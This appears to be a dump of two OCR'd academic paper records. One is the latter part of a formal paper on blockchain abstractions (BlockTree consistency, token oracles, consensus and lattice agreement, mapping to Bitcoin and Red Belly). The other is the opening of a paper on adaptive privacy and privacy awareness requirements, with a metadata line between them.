**Theorem IV.1.** Any history \( H \) satisfying SC criterion satisfies EC and \( \exists H \) satisfying EC that does not satisfy SC, i.e., \( \mathcal{H}_{SC} \subset \mathcal{H}_{EC} \). Proof of Theorem IV.1 and an illustration showing a BT Eventually Consistent history which is not Strongly Consistent are reported in the supplementary materials [3]. Let us remark that the BlockTree allows at any time to create a new branch in the tree, which is called a *fork* in the blockchain literature. Note that that histories with no append operations are trivially admitted. In the following we introduce a new abstract data type called Token Oracle, which when combined with the BlockTree will help in (i) validating blocks and (ii) controlling the presence of forks and their number, if any. B. Token oracle Θ We now formalize the Token Oracle Θ to capture the creation of blocks in the BlockTree structure. The block creation process requires that each new block must be closely related to an already existing valid block in the BlockTree structure. We abstract this implementation-dependent process by assuming that a process will obtain the right to chain a new block \( b_i \) to \( b_h \in B' \), if it successfully gains a token \( tkn_h \) from the token oracle Θ. Once obtained, the proposed block \( b_i \) is considered as valid, and will be denoted by \( b_{i_{k_{tkn_h}}} \). By construction \( b_{i_{k_{tkn_h}}} \in B' \). In the following, in order to be as much general as possible, we model blocks as objects. More formally, when a process wants to access some valid object \( obj_j \), i.e., \( P(obj_j) = T \) it invokes the getToken\((obj_j, obj_j)\) operation with object \( obj_j \) from set \( Ω = \{obj_j, obj_j, \ldots \} \). If getToken\((obj_j, obj_j)\) operation is successful, it returns the valid object \( obj_{j_{k_{tkn}}} \) such that \( tkn_j \) is the token required to access valid object \( obj_j \). The set of valid objects is denoted by \( Ω' \), i.e., \( \forall obj_j \in Ω' \, P(obj_j) = T \). We say that a valid object is generated each time it is successfully returned by a getToken\((obj_j, obj_j)\) operation and it is consumed when the oracle grants the right to associate this valid object \( obj_{j_{k_{tkn}}} \) to \( obj_j \). In the following, once an object is valid, it is clear from the context, we will not explicitly the token \( tkn \) with makes the object valid. A valid object \( obj_{j_{k_{tkn}}} \) is consumed through the consumeToken\((obj_{j_{k_{tkn}}})\) operation. No more than \( k \) valid objects \( obj_{j_1}, \ldots, obj_{j_k} \), \( 1 \leq j \leq k \), can be consumed for \( obj_j \), where \( k \) is a parameter of the token oracle. The side-effect of the consumeToken\((obj_{j_{k_{tkn}}})\) on the state of the token oracle is the insertion of the valid object \( obj_{j_{k_{tkn}}} \) in a set related to \( obj_j \), as long as the cardinality of such set is less than or equal to \( k \). We specify two token oracles, which differ in the way tokens are managed. The first oracle, called prodigal and denoted by \( Θ_P \), has no upper bound on the number of tokens consumed for an object, while the second oracle \( Θ_F \), called frugal, and denoted by \( Θ_F \), guarantees that no more than \( k \) token can be consumed for each object. The prodigal oracle \( Θ_P \) when combined with the BlockTree abstract data type will only help in validating blocks, while the frugal oracle \( Θ_F \) manages tokens in a more controlled way to guarantee that no more than \( k \) forks can occur on a given block. For both oracles, when getToken\((obj_j, obj_j)\) operation is invoked, the oracle provides a valid object with a certain probability \( p_{α_i} > 0 \) where \( α_i \) is a “merit” parameter characterizing the invoking process \( i \). \(^1\) Note that the oracle knows \( α_i \) of the invoking process \( i \), which might be unknown to the process itself. For each merit \( α_i \), the state of the token oracle embeds an infinite tape where each cell of the tape contains either \( tkn \) or \(⊥\). Since each tape is identified by a specific \( α_i \) and \( p_{α_i} \), we assume that each tape contains a pseudorandom sequence of values in \( \{tkn, ⊥\} \) depending on \( α_i \).\(^2\) When a getToken\((obj_j, obj_j)\) operation is invoked by a process with merit \( α_i \), the oracle pops the first cell from the tape associated to \( α_i \), and a valid object is provided to the process if that cell contains \( tkn \). Both oracles enjoy an infinite array of sets, one set for each valid object \( obj_j \), which is populated each time a valid object \( obj_j \) is consumed. When the set cardinality reaches \( k \) then no more tokens can be consumed for that object. For the sake of generality, \( Θ_P \) is defined as \( Θ_F \) with \( k = ∞ \) while for \( Θ_F \) a predetermined \( k \in N \) is specified. Hence, the state of the token oracle contains (i) the infinite array \( K \) of sets (one per valid object) of elements in \( Ω \), (ii) infinite tapes one for each possible merit, and (iii) the branching parameter \( k \). We consider oracles that are linearizable (with respect to their sequential specification): they behave as if all operations, including concurrent ones, are applied sequentially, so that each operation appears to take effect instantaneously as some point between their invocation and their response. The formal specification of \( Θ_P \) and \( Θ_F,k \) abstract data types can be found in the supplementary materials. In Figure 2 is depicted a possible path of the transition system defined by \( Θ_F,k \)-ADT and \( Θ_P \)-ADT. When a process with merit \( α_1 \) invokes getToken\((b_1, b_k)\), with \( b_1 \) the leaf of \( f(bt) \), the first cell of tape\( \alpha_1 \) is popped, and if it contains a token, then getToken\((b_1, b_1)\) returns a valid block \( b_{k_{tkn_h}} \). Afterwards, when consumeToken\((b_{k_{tkn_h}})\) is invoked, the oracle checks if the cardinality of the set in \( K[1] \) is strictly smaller than \( k \), and if the affirmative inserts \( b_{k_{tkn_h}} \) in \( K[1] \). In any cases, consumeToken\((\cdot)\) returns the content of \( K[1] \), in this case \( b_{k_{tkn_h}} \). It follows that a process that gets a valid block for some block \( b_h \) but is not allowed to consume it, is anyway notified with the set of valid blocks that saturated \( K[h] \). C. BT-ADT augmented with Θ Oracles We augment the BT-ADT with Θ oracles and we analyze the histories generated by their combination. Specifically, we define a refinement of the append\((b_i)\) operation of the BT-ADT with the oracle operations as follows: the append\((b_i)\) operation triggers the getToken\((b_h \leftarrow \text{last block}(\cdot), b_h)\) operation as long as it returns a valid block \( b_{i_{k_{tkn_h}}} \), and once obtained, the valid block might be consumed, and in any cases the append\((b_i)\) operation terminates. If less than \( k \) valid \(^1\)The merit parameter can reflect for instance the hashing power of the invoking process. \(^2\)We assume a pseudorandom sequence mostly indistinguishable from a Bernoulli sequence consisting of a finite or infinite number of independent random variables \( X_1, X_2, X_3, \ldots \) such that (i) for each \( k \), the value of \( X_k \) is either \( tkn \) or \(⊥\); and (ii) \( X_k \) the probability that \( X_k = tkn \) is \( p_{α_i} \). blocks have already been consumed for $b_i$, the valid block is consumed i.e. block $b'_k$ is appended to the block $k$ in the blockchain $f(b')$ (i.e., $\{b_0\} \cap f(b') \cap \{b_i\}$) and the append($b_k$) operation returns true, otherwise false. We say that the $BT$-ADT augmented with $\Theta_F$ or $\Theta_P$ oracle is a refinement $\mathcal{R}$($BT$-ADT, $\Theta_F$) or $\mathcal{R}$($BT$-ADT, $\Theta_P$) respectively. The formal specification of these refinements are given in the supplementary materials. **Definition IV.9** ($k$-Fork coherence). A concurrent history $H = \langle \Sigma, E, \Lambda, \rightarrow, \lhd, \triangleright, \triangledown \rangle$ of $\mathcal{R}$($BT$-ADT, $\Theta_{F,k}$) satisfies the $k$-Fork coherence if there are at most $k$ append($b'_k$) operations that return true for the same block $b_k$. **Theorem IV.2** ($k$-Fork Coherence). Any concurrent history $H = \langle \Sigma, E, \Lambda, \rightarrow, \lhd, \triangleright, \triangledown \rangle$ of $\mathcal{R}$($BT$-ADT, $\Theta_{F,k}$) satisfies the $k$-Fork Coherence. **D. Hierarchy** We propose a hierarchy between $BT$-ADTs augmented with token oracle ADTs. We use the following notation: $BT$-ADT$_{SC}$ and $BT$-ADT$_{EC}$ to refer respectively to $BT$-ADT generating concurrent histories that satisfy the $SC$ and the $EC$ consistency criteria. When augmented with token oracles we get the following four typologies, where for the frugal oracle we explicit the value of $k$: $\mathcal{R}$($BT$-ADT$_{SC}$, $\Theta_{F,k}$), $\mathcal{R}$($BT$-ADT$_{SC}$, $\Theta_P$), $\mathcal{R}$($BT$-ADT$_{EC}$, $\Theta_P$), $\mathcal{R}$($BT$-ADT$_{EC}$, $\Theta_{F,k}$). We aim at studying the relationships among the different refinements. Let $\hat{\mathcal{R}}^n(BT$-ADT, $\Theta_{F,k})$ be the set of concurrent histories generated by a $BT$-ADT enriched with $\Theta_{F,k}$-ADT and $\hat{\mathcal{R}}^n(BT$-ADT, $\Theta_P$) be the set of concurrent histories generated by a $BT$-ADT enriched with $\Theta_P$-ADT. Without loss of generality, we consider only the set of histories from which have been purged unsuccessful append() response events (i.e., such that the returned value is false). All the following theorems are proven in the supplementary materials. **Theorem IV.3.** $\hat{\mathcal{R}}^n(BT$-ADT, $\Theta_{F,k}) \subseteq \hat{\mathcal{R}}^n(BT$-ADT, $\Theta_F$). **Theorem IV.4.** If $k_1 \leq k_2$ then $\hat{\mathcal{R}}^n(BT$-ADT, $\Theta_{F,k_1}) \subseteq \hat{\mathcal{R}}^n(BT$-ADT, $\Theta_{F,k_2}$). Finally, from Theorem IV.1, we have the following corollary. **Corollary IV.4.1.** $\hat{\mathcal{R}}^n(BT$-ADT$_{SC}, \Theta_{F,k}) \subseteq \hat{\mathcal{R}}^n(BT$-ADT$_{EC}, \Theta_{F,k})$. The above results imply the hierarchy depicted in Figure 4. The arrows $A \rightarrow B$ in the figure indicate that the set of histories in $A$ are included in the set of histories in $B$ according to Theorems and Lemmas presented in Section V. **V. Implementing $BT$-ADTs** **A. Implementability in the shared memory model** We now consider a system made of $n$ processes such that up to $f$ of them are faulty (stop prematurely by crashing), $f < n$. Non faulty processes are said correct. Processes communicate through atomic registers. 1) Frugal oracle $\Theta_{F,k=1}$ is at least as strong as Consensus: We show that there exists a wait-free implementation of Consensus [17] by $\Theta_{F,k=1}$. Note that similarly to [8], we extend the validity property of Consensus to fit the blockchain setting. Specifically, we have **Definition V.1** (Consensus $C$). - **Validity** A value is valid if it satisfies the predefined predicate $P$. - **Termination**. Every correct process eventually decides some value, and that value must be valid. - **Integrity**. No correct process decides twice. - **Agreement**. If there is a correct process that decides value $b$, then eventually all the correct processes decide $b$. We first show that there exists a wait-free implementation of the Compare&Swap() object by $\Theta_{F,k=1}$ assuming that blocks are valid, i.e., belong to $B$. Doing this implies that, under the assumption that blocks are valid, $\Theta_{F,k=1}$ has the same Consensus number as Compare&Swap(), i.e., $\infty$ (see [15]). We then show that there is a wait-free implementation of Consensus $C$ by $\Theta_{F,k=1}$ for any block $b \in B$ (i.e., $b$ may not be valid). Doing this will imply that $\Theta_{F,k=1}$ has the same Consensus number as Consensus(), i.e., $\infty$. ![Diagram](image) Recall that Compare&Swap() takes three parameters as input, the register, the old_value and the new_value. If the value in register is the same as old_value then the new_value is stored in register and in any case the operation returns the value that was in register at the beginning of the operation. Figure 5 proposes an algorithm that reduces CAS object to $\Theta_{F,k=1}$ object. **Theorem V.1.** If input values are in $B'$ then there exists an implementation of CAS by $\Theta_{F,k=1}$. Figure 6 describes a simple implementation of Consensus with the block $b_i$ to which $p$ wishes to append its block $b$, it first sets its proposal (Line 1), and then loops invoking the getToken($b_i$, proposal) operation until a valid block is returned (Lines 3-4). Once process $p$ obtain a valid block, it invokes the consumeToken() operation with this valid block as a parameter. The consumeToken() returns the unique valid block for level $\text{level}$ (Line 5). Note that this unique valid block is the one of the first process that invoked the consumeToken() operation. Thus the decision value is the valid block of the first process that invoke the consumeToken() operation (see Line 5), and thus it is the same for all the processes. **Theorem V.2.** $\Theta_{F,k=1}$ Oracle has Consensus number $\infty$. 2) **Prodigal oracle $\Theta_p$ is not stronger than Generalized Lattice Agreement:** In this section we present a reduction of the prodigal oracle $\Theta_p$ to Generalized Lattice Agreement (GLA) [12]. We will first recall the properties of GLA, a version of lattice agreement generalized to a possibly infinite sequence of input values. **Definition V.2 (GLA Problem [12]).** Let $L$ be a join semi-lattice with a partial order $\sqsubseteq$. Each process may propose an input value belonging to the lattice at any point in time. There is no bound on the number of input values a process may propose. Let $v_i^x$ denote the $x$-th input value proposed by a process $p_i$. The objective is for each process $p_i$ to learn a sequence of output values $w_i^x$ that satisfy the following conditions: 1) **Validity.** Any learnt value $w_i^x$ is a join of some set of input values. 2) **Stability.** The value learnt by any process $p_i$ increases monotonically: $x < y \Rightarrow w_i^x \sqsubseteq w_i^y$. 3) **Consistency.** Any two values \( w_i^x \) and \( w_j^y \) learnt by any two processes \( p_i \) and \( p_j \) are comparable. 4) **Liveness.** Every value \( v_i^x \) proposed by a correct process \( p_i \) is eventually included in some learnt value \( w_j^y \) of every correct process \( p_j \), i.e. \( v_i^x \sqsubseteq w_j^y \) a) **Reduction of the prodigal oracle to Generalized Lattice Agreement:** In order to show the reduction of the prodigal oracle to GLA, we consider a lattice for each possible object \( obj_h \), a process wants to append its own object to. Intuitively, in the context of the BT-ADT, the object \( obj_h \) is a vertex of a tree that maps to a lattice whose input values are subsets of the vertex’s children. In order to formally define the input values of the lattice, let us recall that a consume token operation invoked to chain an object \( obj_e \) to a given object \( obj_h \), i.e., \( \text{consumeToken}(obj_e^{tkn_h}) \), returns a set of objects that includes the chained object \( obj_e^{tkn_h} \). In this context, the lattice input values belong then to the objects power set, where the greatest lower bound is the empty set. Figure 7 shows an implementation of consumeToken by GLA, where the process executes \( \text{proposeValue}(\{obj_e^{tkn_h}\}) \) of GLA, taking the singleton set \( \{obj_e^{tkn_h}\} \) to be a newly proposed value. The consume token returns a set that reflects all the objects in the learnt set, which includes the proposed object. **Theorem V.3.** \( \Theta_P \) Oracle is not stronger than Generalized Lattice Agreement. **Proof.** (Sketch) The proof follows from the implementation in Figure 7. Let us recall that the oracle must behave as an atomic object, which means that we need to show that the oracle is linearizable through GLA. GLA proposed values in our implementation are sets, where each proposed value is a singleton set containing a uniquely identified object. The join of any two proposed values is the union of the proposed singleton sets. Any learnt set is the union of some proposed sets. Any two learnt sets are comparable through the inclusion operator. The first step is to show that the order of non-overlapping consumeToken operations is preserved: if a process \( p_i \) completes a consumeToken \( ct_1 \) operation before another process \( p_j \) invokes another \( ct_2 \) operation, then we must ensure that \( ct_1 \) occurs before \( ct_2 \) in the linearization order, i.e. the effect of \( ct_1 \) is visible to \( ct_2 \). Note that from the pseudo-code, the only values included in \( K[h] \) are learnt values, i.e. a join of some proposed values by the GLA Validity and from Line 2. Moreover, from Line 3 each process waits for its own proposed set to be learnt before the consumeToken completes. This means that the proposed set \( set_1 \) by \( ct_1 \) is learnt and included in \( K[h] \), before \( ct_2 \) is invoked. Since the learnt value \( set_1 \) through \( ct_1 \) must now be comparable to the learnt set \( set_2 \) through \( ct_2 \), this implies that the learnt set \( set_2 \) through \( ct_2 \) must also include \( set_1 \). \( K[h] \) will then include \( set_1 \), i.e. \( ct_2 \) has seen the effect of \( ct_1 \). The second step is to show that any two concurrent operations \( ct_1 \) and \( ct_2 \) can be linearized. By Consistency, even in this case the learnt values must be comparable, either \( set_1 \) is included in \( set_2 \) or the other way round. In both cases the effect of one operation is visible to the other one, and then they can be linearized. The last step is to show the the implementation is wait-free. Wait-freedom is ensured by the Liveness property of GLA that ensures that the execution time of Line 3 is finite. **B. Implementability in a message-passing system model** In this section we are interested in distributed message-passing implementations of BT-ADTs. In the following, we will present (i) the necessity of a light form of reliable broadcast to implement BT Eventual consistency, (ii) refinement of BTs with Oracles that are not implementable in a message-passing system and (iii) the mapping of current existing implementations with our abstract data types. To this end, we consider a message-passing system composed of an arbitrarily large but finite set of processes, such that a subset of them can fail by exhibiting Byzantine failures, that is deviates arbitrarily from the distributed protocol $P$ it should execute. A non-faulty process is said correct. Processes communicate by exchanging messages over communication channels that can be asynchronous or synchronous (see [6]). We will specify whenever necessary the synchrony assumptions of the channels. By default we consider asynchronous channels. The BlockTree is considered as a shared object replicated at each process. Let $bt_i$ be the local copy of the BlockTree maintained at process $i$. To maintain the replicated object we consider histories made of events related to the read and append operations on the shared object, i.e. the send and receive operations for process communications and the update operation for BlockTree replica updates. We also use subscript $i$ to indicate that the operation occurred at process $i$: $update_i(b_g, b_t)$ indicates that $i$ inserts its locally generated valid block $b_g$ in $bt_i$ with $b_g$ as a predecessor. Updates are communicated through send and receive operations: an update related to a block $b_t$ generated on a process $p_i$, which is sent through the send$_i(b_g, b_t)$ operation, and which is received through the receive$_j(b_g, b_t)$ operation, takes effect on the local replica $bt_j$ of $p_j$ with the update$_j(b_g, b_t)$ operation. In the remaining of this work we consider implementations of BT-ADT in a Byzantine failure model where the set of events $E$ is restricted to a countable set of events that contains (i) all the BT-ADT read( ) operations invocation events by the correct processes, (ii) all BT-ADT read( ) operations response events at the correct processes, (iii) all append( ) operations invocation events such that $b$ satisfies predicate $P$ and, finally (iv) send, receive and update events generated at correct processes. Note that the Oracle-ADT is by construction agnostic to failures. 1) Necessity of reliable communication: We define the properties on the communication primitive that each history $H$ generated by a BT-ADT satisfying the Eventual Prefix Property must satisfy. We need to first introduce the following definition: **Definition V.3** (Update agreement). A concurrent history $H = (\Sigma, E, \Lambda, \rightarrow, \prec, \nto)$ generated by a BT-ADT satisfies the update agreement property if properties R1, R2 and R3 hold. - **R1.** $\forall update_i(b_g, b_t) \in H, \exists send_i(b_g, b_t) \in H$; - **R2.** $\forall update_i(b_g, b_t) \in H, \exists receive_i(b_g, b_t) \in H$ such that $receive_i(b_g, b_t) \rightarrow update_i(b_g, b_t)$; - **R3.** $\forall update_i(b_g, b_t) \in H, \exists receive_k(b_g, b_t) \in H, \forall k$. **Theorem V.4.** The update agreement property is necessary to construct concurrent histories $H = (\Sigma, E, \Lambda, \rightarrow, \prec, \nto)$ generated by a BT-ADT that satisfy the BT Eventual Consistency criterion. **Proof.** The intuition of the proof is that to meet BT Eventual Consistency all the processes must have the same view of BlockTree eventually. In fact missing an update on the branch that will be eventually selected (which cannot be a-priori-known) would imply that the prefix (which will be arbitrarily long) for the process that missed the update will diverge forever. For space reason the proof of the theorem can be found in the supplementary materials. We can now present the Light Reliable Communication (LRC) primitive. **Definition V.4** (Light Reliable Communication (LRC)). A concurrent history $H$ satisfies the properties of the LRC abstraction if and only if: - (Validity): $\forall send_i(b, b_t) \in H, \exists receive_i(b, b_t) \in H$; - (Agreement): $\forall receive_i(b, b_j) \in H, \forall k \exists receive_k(b, b_j) \in H$ From Theorem V.4, it is straightforward to show that LRC is necessary to implement BT Eventual consistency (by using arguments from [6]). The proof of the necessity is based on the Validity and Agreement for $R1, R2$ and $R3$. The interested reader can refer to the supplementary materials for the proof. **Theorem V.5.** The LRC primitive is necessary for any BT-ADT implementation that generates concurrent histories which satisfies the BT Eventual Consistency criterion. By Theorem IV.1, the results trivially hold for the BT Strong consistency criterion. 2) **Impossibility of BT Strong Consistency with forks:** The following theorem states that BT Strong consistency cannot be implemented if forks can occur. Intuitively the proof is based on showing a scenario in which two concurrent updates $b_i$ and $b_j$ are issued, linked to a same block $b$ and two reads at two different processes read $b \sim b_i$ and $b \sim b_j$, violating the Strong prefix property. **Observation.** Following our Oracle based abstraction (Section IV-C) we assume by definition that the synchronization on the block to append is oracle side and takes place during the append operation. It follows that when an append operation occurs and a correct process updates its local blocktree then it cannot use anything weaker than the LRC communication abstraction. **Theorem V.6.** There does not exist an implementation of \(\mathcal{R}(\text{BT-ADT}_\text{SC}, \Theta)\) with \(\Theta \neq \Theta_{F,k=1}\) that uses a LRC primitive and generates histories satisfying the BT Strong consistency. The non-implementability of refinement \(\mathcal{R}(\text{BT-ADT}_\text{SC}, \Theta_{P})\) and \(\mathcal{R}(\text{BT-ADT}_\text{SC}, \Theta_{F,k=1})\) is a direct implication of the theorem, whose effect is reported in gray in Figure 4. From Theorem V.6 the next Corollary follows. **Corollary V.6.1.** \(\Theta_{F,k=1}\) is necessary for any implementation of \(\mathcal{R}(\text{BT-ADT}_\text{SC}, \Theta)\) that generates histories satisfying the BT Strong consistency. Thanks to Theorem V.2 the next Corollary also follows. **Corollary V.6.2.** Consensus is necessary for any implementation of a BT-ADT that generates histories satisfying the BT Strong consistency. C. Mapping with existing Blockchain implementations We complete this work by illustrating the mapping in the following table between different existing systems and the specifications and abstractions presented in this paper. Interestingly, the mapping shows that all the proposed abstractions are implemented (even though in a probabilistic way in some case), and that the only two refinements used are \(\mathcal{R}(\text{BT-ADT}_\text{SC}, \Theta_{F,k=1})\) and \(\mathcal{R}(\text{BT-ADT}_\text{EC}, \Theta_{P})\). In the following we discuss Bitcoin and Red Belly, an interested reader can find the discussions for the other systems in the supplementary materials. <table> <thead> <tr> <th>References</th> <th>Refinement</th> </tr> </thead> <tbody> <tr> <td>Bitcoin [19]</td> <td>(\mathcal{R}(\text{BT-ADT}<em>\text{EC}, \Theta</em>{P})) EC w.h.p</td> </tr> <tr> <td>Ethereum [24]</td> <td>(\mathcal{R}(\text{BT-ADT}<em>\text{EC}, \Theta</em>{P})) EC w.h.p</td> </tr> <tr> <td>Algorand [13]</td> <td>(\mathcal{R}(\text{BT-ADT}<em>\text{SC}, \Theta</em>{F,k=1})) SC w.h.p</td> </tr> <tr> <td>ByzCoin [16]</td> <td>(\mathcal{R}(\text{BT-ADT}<em>\text{SC}, \Theta</em>{F,k=1}))</td> </tr> <tr> <td>PeerCensus [9]</td> <td>(\mathcal{R}(\text{BT-ADT}<em>\text{SC}, \Theta</em>{F,k=1}))</td> </tr> <tr> <td>Redbelly [8]</td> <td>(\mathcal{R}(\text{BT-ADT}<em>\text{SC}, \Theta</em>{F,k=1}))</td> </tr> <tr> <td>Hyperledger [4]</td> <td>(\mathcal{R}(\text{BT-ADT}<em>\text{SC}, \Theta</em>{F,k=1}))</td> </tr> </tbody> </table> D. Bitcoin In Bitcoin [19] each process \(p \in V\) is allowed to read the BlockTree and append blocks to the BlockTree. Processes are characterized by their computational power represented by \(\alpha_p\), normalized as \(\sum_{p \in V} \alpha_p = 1\). Processes communicate through reliable FIFO authenticated channels, which models a partially synchronous setting [10]. Valid blocks are flooded in the system. The getToken operation is implemented by a proof-of-work mechanism. The consumeToken operation returns true for all valid blocks, thus there is no bounds on the number of consumed tokens. Thus Bitcoin implements a Prodigal Oracle. The selection function \(f\) selects the blockchain which has required the most computational work, guaranteeing that concurrent blocks can only refer to the most recently appended blocks of the blockchain returned by a read() operation. Garay and al [20] have shown, under a synchronous environment assumption, that Bitcoin ensures Eventual consistency criteria with high probability. The same conclusion applies as well for the FruitChain protocol [21], which proposes a protocol similar to BitCoin except for the rewarding mechanism. E. Red Belly Red Belly [8] is a consortium blockchain, meaning that any process \(p \in V\) is allowed to read the BlockTree but a predefined subset \(M \subseteq V\) of processes are allowed to append blocks. Each process \(p \in M\) has a merit parameter set to \(\alpha_p = 1/|M|\) while each process \(p \in V \setminus M\) has a merit parameter \(\alpha_p = 0\). Each process \(p \in M\) can invoke the getToken operation with their new block and will receive a token. The consumeToken operation, implemented by a Byzantine consensus algorithm run by all the processes in \(V\), returns true for the uniquely decided block. Thus Red Belly BlockTree contains a unique blockchain, meaning that the selection function \(f\) is the trivial projection function from \(BT \rightarrow BC\) which associates to the BT-ADT its unique existing chain of the BlockTree. As a consequence Red Belly relies on a Frugal Oracle with \(k = 1\), and by the properties of Byzantine agreement implements a strongly consistent BlockTree (see Theorem 3 [8]). VI. Conclusions and Future Work The paper presented a formal specification of blockchains and derived interesting conclusions on their implementability. Let us note that the presented work is intended to provide the groundwork for the construction of a sound hierarchy of blockchain abstractions and correct implementations. We believe that the presented results are also of practical interests since our oracle construction not only reflects the design of many current implementations, but will help designers in choosing the oracle they want to implement with a clear semantics and inherent trade-offs in mind. Future work will focus on several open issues, such as the solvability of Eventual Prefix in message-passing, the synchronization power of other oracle models, and fairness properties for oracles. a) Acknowledgments: The authors thank the referees for their helpful comments. REFERENCES
{"Source-Url": "https://cnrs.hal.science/hal-02380364/file/mainSPAA-hal.pdf", "len_cl100k_base": 13492, "olmocr-version": "0.1.53", "pdf-total-pages": 12, "total-fallback-pages": 0, "total-input-tokens": 51419, "total-output-tokens": 16107, "length": "2e13", "weborganizer": {"__label__adult": 0.00047850608825683594, "__label__art_design": 0.00044345855712890625, "__label__crime_law": 0.0005369186401367188, "__label__education_jobs": 0.0008664131164550781, "__label__entertainment": 0.0001461505889892578, "__label__fashion_beauty": 0.00022995471954345703, "__label__finance_business": 0.0012531280517578125, "__label__food_dining": 0.0005464553833007812, "__label__games": 0.0012359619140625, "__label__hardware": 0.0018663406372070312, "__label__health": 0.0010662078857421875, "__label__history": 0.0005946159362792969, "__label__home_hobbies": 0.00016808509826660156, "__label__industrial": 0.0009050369262695312, "__label__literature": 0.000530242919921875, "__label__politics": 0.0005950927734375, "__label__religion": 0.0007429122924804688, "__label__science_tech": 0.352783203125, "__label__social_life": 0.00012385845184326172, "__label__software": 0.01139068603515625, "__label__software_dev": 0.62158203125, "__label__sports_fitness": 0.0003736019134521485, "__label__transportation": 0.0010013580322265625, "__label__travel": 0.0002999305725097656}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 57006, 0.01505]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 57006, 0.43292]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 57006, 0.84056]], "google_gemma-3-12b-it_contains_pii": [[0, 470, false], [470, 5757, null], [5757, 12326, null], [12326, 18228, null], [18228, 23751, null], [23751, 30544, null], [30544, 35092, null], [35092, 37417, null], [37417, 41893, null], [41893, 46855, null], [46855, 52880, null], [52880, 57006, null]], "google_gemma-3-12b-it_is_public_document": [[0, 470, true], [470, 5757, null], [5757, 12326, null], [12326, 18228, null], [18228, 23751, null], [23751, 30544, null], [30544, 35092, null], [35092, 37417, null], [37417, 41893, null], [41893, 46855, null], [46855, 52880, null], [52880, 57006, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, true], [5000, 57006, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 57006, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 57006, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 57006, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, false], [5000, 57006, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 57006, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 57006, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 57006, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 57006, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 57006, null]], "pdf_page_numbers": [[0, 470, 1], [470, 5757, 2], [5757, 12326, 3], [12326, 18228, 4], [18228, 23751, 5], [23751, 30544, 6], [30544, 35092, 7], [35092, 37417, 8], [37417, 41893, 9], [41893, 46855, 10], [46855, 52880, 11], [52880, 57006, 12]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 57006, 0.04569]]}
olmocr_science_pdfs
2024-12-09
2024-12-09
80b2c37562aac2a37aaa316b7efa5bdfb1db0dcf
Engineering adaptive privacy: on the role of privacy awareness requirements Engineering Adaptive Privacy: On the Role of Privacy Awareness Requirements Inah Omoronyia¹, Luca Cavallaro², Mazeiar Salehie², Liliana Pasquale³, Bashar Nuseibeh²,³ ¹School of Computing, University of Glasgow, UK ²Lero – The Irish Software Engineering Research Centre, University of Limerick, Ireland ³Department of Computing, The Open University, UK inh.omoronyia@glasgow.ac.uk, {luca.cavallaro, mazeiar.salehie, liliana.pasquale, bashar.nuseibeh}@lero.ie Abstract—Applications that continuously gather and disclose personal information about users are increasingly common. While disclosing this information may be essential for these applications to function, it may also raise privacy concerns. Partly, this is due to frequently changing context that introduces new privacy threats, and makes it difficult to continuously satisfy privacy requirements. To address this problem, applications may need to adapt in order to manage changing privacy concerns. Thus, we propose a framework that exploits the notion of privacy awareness requirements to identify runtime privacy properties to satisfy. These properties are used to support disclosure decision making by applications. Our evaluations suggest that applications that fail to satisfy privacy awareness requirements cannot regulate users’ information disclosure. We also observe that the satisfaction of privacy awareness requirements is useful to users aiming to minimise exposure to privacy threats, and to users aiming to maximise functional benefits amidst increasing threat severity. Index Terms—Privacy, utility, selective disclosure, adaptation I. INTRODUCTION Consumers and enterprises increasingly rely on mobile and ubiquitous applications, such as smart phones, to satisfy their social and business needs. This new generation of applications enable users to form localised, short- and long-lived groups or communities to achieve common objectives. These applications may need to gather and disclose users’ sensitive information such as location, time, proximity to nearby services, and connectivity to other users. The exposure of such information in an unregulated way can threaten user privacy [1]. This calls for a more systematic approach for considering the privacy requirements of users in software applications. A representative class of such requirements is selective disclosure – deciding what information to disclose, in which context, and the degree of control an individual has over disclosed information [3]. A key determinant of selective disclosure is frequently changing context; e.g., changing time, location and group properties. These changes blur the boundary between public and personal spaces and may introduce unforeseen privacy threats [2]. Additionally, users may be unaware of when and for what purpose sensitive information about them is being collected, analysed or transmitted. This makes it even more difficult for users and applications to adapt in order to continue satisfying their privacy requirements. In this paper, we present an adaptive privacy framework that aims to support the selective disclosure of personal information in software applications. We follow the popular MAPE (Monitor, Analyse, Plan and Execute) loop [8] for designing adaptive applications. Our framework consists of models, techniques and tools, and focuses on the role of privacy awareness requirements (PAR) that embody three concerns: (i) the identification of what attributes to monitor in order to detect privacy threats; (ii) the discovery of such threats before personal information is disclosed; and (iii) a utility for the severity of discovered threats, as well as for the benefit that can be derived if associated information is disclosed. We suggest and demonstrate that an advantage of this approach is that decisions on whether or not to disclose information can be made based on reliable knowledge of both its cost and benefit to the user of the application. Our approach relies on software behavioural and context models, and the privacy requirements of users, to identify attributes to monitor in order to discover a privacy threat. A privacy threat is discovered by searching the history of system interactions that may affect the satisfaction of a user’s privacy requirements. The severity of identified threat and the associated benefit of disclosure are determined by analysing the evolving properties of generated networks emerging from users’ interactions. Subsequently, we investigate the relevance of such utility measure during the planning phase of software adaptation. Our approach for identifying monitored attributes had been implemented in an openly accessible automated environment [4]. In this paper, we evaluated our framework using a comparative study to examine the consequence of the satisfaction/failure of PAR during the planning phase of adaptive privacy. First, we showed that applications that fail to satisfy PAR are unable to manage privacy based on the utility of disclosure. Second, we showed that applications that satisfy PAR are able to regulate the disclosure of information with changing context. The remainder of the paper is organised as follows. Section II presents some related work on privacy awareness and adaptation relevant to our overall approach, which 